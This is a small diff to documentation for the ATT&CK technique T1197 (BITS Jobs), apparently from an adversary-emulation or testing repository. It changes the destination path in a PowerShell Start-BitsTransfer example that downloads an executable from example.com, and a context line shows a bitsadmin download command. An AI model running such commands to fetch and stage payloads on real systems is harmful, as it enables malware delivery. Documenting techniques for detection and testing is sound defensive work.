--- a/Techniques/T1197/T1197.md
+++ b/Techniques/T1197/T1197.md
@@ -17,7 +17,7 @@ bitsadmin.exe /transfer txt /download /priority normal http://example.com/exampl
 Download a payload leveraging PowerShell:
 ```
 powershell
-Start-BitsTransfer -Priority foreground -Source http://example.com/example.exe -Destination %ALLUSERSPROFILE%\example.exe
+Start-BitsTransfer -Priority foreground -Source http://example.com/example.exe -Destination C:\ClientDir\example.exe
 ```
 
 # References
